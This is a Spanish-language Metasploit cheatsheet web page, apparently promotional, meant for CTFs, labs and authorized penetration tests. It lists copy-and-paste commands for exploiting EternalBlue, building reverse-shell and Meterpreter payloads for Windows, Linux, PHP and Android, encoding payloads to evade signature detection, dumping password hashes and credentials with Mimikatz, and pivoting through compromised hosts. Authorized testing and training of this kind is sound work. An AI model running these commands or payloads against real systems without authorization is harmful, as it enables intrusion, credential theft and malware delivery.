Metasploit — Cheatsheet 2026

Todos los comandos del Metasploit Framework — flujo msfconsole, payloads msfvenom, Meterpreter, gestión de sesiones, handlers y pivoting. Listo para copiar y pegar en CTF, labs y pentests autorizados.

Última actualización:

¿Principiante? Lee nuestra guía completa para empezar y sitúa Metasploit en la metodología.

Navegación rápida

01 Inicio & base de datos 02 Buscar módulos 03 Flujo de explotación 04 Payloads 05 multi/handler 06 msfvenom 07 Meterpreter 08 Sesiones 09 Post-explotación 10 Pivoting

# Inicio & configuración de la base de datos

Inicializa primero la base PostgreSQL — almacena hosts, servicios y botín, y acelera mucho la búsqueda.

sudo msfdb init
Inicializar la base PostgreSQL de Metasploit (una vez)
msfconsole -q
Lanzar la consola en modo silencioso (sin banner)
db_status
Comprobar la conexión a la base de datos
db_nmap -sV -sC 10.10.10.5
Ejecutar nmap desde msf y guardar los resultados en la base
hosts; services
Listar hosts y servicios descubiertos desde la base
workspace -a client_x
Crear un espacio de trabajo aislado por proyecto

# El flujo de explotación

El bucle central: use → ajustar opciones → check → exploit. El mismo patrón para cada módulo.

use exploit/windows/smb/ms17_010_eternalblue
Seleccionar un módulo exploit
show options
Listar los ajustes requeridos y opcionales
set RHOSTS 10.10.10.5
Definir el/los host(s) objetivo
set LHOST tun0
Definir tu IP de listener — usa el nombre de interfaz para auto-resolverla
set LPORT 443
Definir el puerto del listener
check
Probar si el objetivo es vulnerable sin explotar (si está soportado)
exploit -j
Ejecutar el exploit como trabajo en segundo plano

# Payloads

Elige un payload acorde al objetivo y tu red. Staged (/) necesita un stager; stageless (_) es un único blob autónomo.

show payloads
Listar los payloads compatibles con el exploit seleccionado
set payload windows/x64/meterpreter/reverse_tcp
Meterpreter staged por reverse TCP
set payload windows/x64/meterpreter_reverse_https
Meterpreter stageless por HTTPS — mejor a través de proxies/firewalls
set payload linux/x64/shell_reverse_tcp
Reverse shell simple (cuando Meterpreter no está disponible)
💡 Consejo: Staged (windows/.../reverse_tcp) envía primero un stager pequeño; stageless (meterpreter_reverse_tcp) es un solo blob — más fiable en enlaces inestables.

# multi/handler — recibir cualquier shell

Usa el handler para recibir la conexión de un payload que generaste con msfvenom o dejaste manualmente.

use exploit/multi/handler
Seleccionar el handler genérico de payloads
set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run
Configurar para que coincida con tu payload e iniciar la escucha
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run"
One-liner para lanzar un handler directamente desde la shell
set ExitOnSession false
Mantener el handler activo para recibir múltiples shells

# msfvenom — generar payloads

Crea archivos de payload autónomos en cualquier formato. Recíbelos con un multi/handler correspondiente.

msfvenom -l payloads
Listar todos los payloads disponibles
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o shell.exe
Ejecutable Meterpreter para Windows
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elf
ELF reverse shell para Linux
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.php
Meterpreter PHP para subida web
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o enc.exe
Codificado para evadir la detección básica por firma
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=443 -o app.apk
APK Meterpreter para Android

# Comandos Meterpreter

Una vez tengas una sesión Meterpreter, estos son los comandos del día a día.

sysinfo; getuid
Info del SO y usuario actual
getsystem
Intentar escalada de privilegios automática a SYSTEM
getprivs
Listar los privilegios del token actual
hashdump
Volcar los hashes de contraseñas del SAM local (requiere SYSTEM)
upload /tmp/winPEAS.exe C:\\Windows\\Temp\\
Subir un archivo al objetivo
download C:\\Users\\admin\\Desktop\\proof.txt
Descargar un archivo desde el objetivo
shell
Pasar a una shell nativa del SO (exit para volver a Meterpreter)
migrate -N explorer.exe
Migrar a un proceso estable por nombre
load kiwi; creds_all
Cargar la extensión Mimikatz (kiwi) y volcar credenciales

# Gestión de sesiones

Maneja múltiples shells y mejora las shells básicas a Meterpreter.

sessions -l
Listar todas las sesiones activas
sessions -i 1
Interactuar con la sesión 1
Ctrl+Z
Enviar la sesión actual a segundo plano (la mantiene viva)
sessions -u 2
Mejorar una shell básica (sesión 2) a Meterpreter
sessions -c "whoami" -i 1
Ejecutar un comando en una sesión sin interactuar
sessions -K
Matar todas las sesiones

# Módulos de post-explotación

Ejecuta módulos post contra una sesión existente para enumeración y persistencia.

run post/multi/recon/local_exploit_suggester
Sugerir exploits de escalada local para la sesión
run post/windows/gather/enum_logged_on_users
Enumerar los usuarios conectados
run post/windows/manage/migrate
Migración automática a un proceso más seguro
run post/multi/manage/shell_to_meterpreter
Mejorar una sesión shell a Meterpreter

# Pivoting

Usa un host comprometido como pasarela hacia subredes internas que no puedes alcanzar directamente.

run autoroute -s 10.10.20.0/24
Añadir una ruta a una subred interna a través de la sesión
use post/multi/manage/autoroute; set SESSION 1; run
Igual mediante el módulo post
use auxiliary/server/socks_proxy; set SRVPORT 1080; run -j
Iniciar un proxy SOCKS para herramientas fuera de Metasploit
proxychains nmap -sT -Pn 10.10.20.10
Enrutar herramientas externas a través del pivote con proxychains
portfwd add -l 3389 -p 3389 -r 10.10.20.10
Reenviar un puerto del objetivo a tu máquina local

❓ FAQ Metasploit

El framework de pentesting más usado — miles de exploits, payloads, módulos auxiliares y post tras una consola (msfconsole). Buscas un módulo, ajustas sus opciones (RHOSTS, LHOST) y lo lanzas.

msfconsole es la consola interactiva para lanzar módulos. msfvenom genera archivos de payload autónomos (exe, elf, php, apk). A menudo generas con msfvenom y recibes con un multi/handler.

El payload avanzado en memoria de Metasploit. Ofrece transferencia de archivos, getsystem, hashdump, captura de pantalla, keylogging y pivoting — sin escribir en disco, más sigiloso que una shell normal.

use exploit/multi/handler, ajusta payload para que coincida con tu payload de msfvenom, ajusta LHOST/LPORT, y run. Recibe la conexión entrante y abre una sesión.

sessions -l lista, sessions -i ID interactúa, Ctrl+Z envía a segundo plano. Ejecuta sin interactuar con sessions -c 'whoami' -i ID, mejora una shell con sessions -u ID.

Desde Meterpreter, run autoroute -s 10.10.20.0/24, luego usa escáneres auxiliares internamente, o inicia auxiliary/server/socks_proxy y apunta proxychains a él.

Puedes usar Metasploit/Meterpreter en una sola máquina de tu elección; está restringido en las demás, así que domina la explotación manual. msfvenom para payloads suele permitirse — revisa siempre las reglas vigentes.

En Kali: sudo apt update && sudo apt install metasploit-framework. Con el instalador de Rapid7, usa msfupdate. Luego ejecuta msfconsole y reload_all para reconstruir la caché de módulos.

📚 Recursos relacionados

Informe de pentest asistido por IA

Convierte tus sesiones de Metasploit en un informe PDF profesional. La IA rellena CVE, CVSS y severidad.

Probar gratis →

¿Quieres los 12 020+ comandos?

Esta cheatsheet de Metasploit es solo una rama del mapa. Pentest Mindmap organiza 12 020+ comandos en 34 categorías — de recon a post-explotación — con búsqueda instantánea y copia en un clic.

Empezar gratis →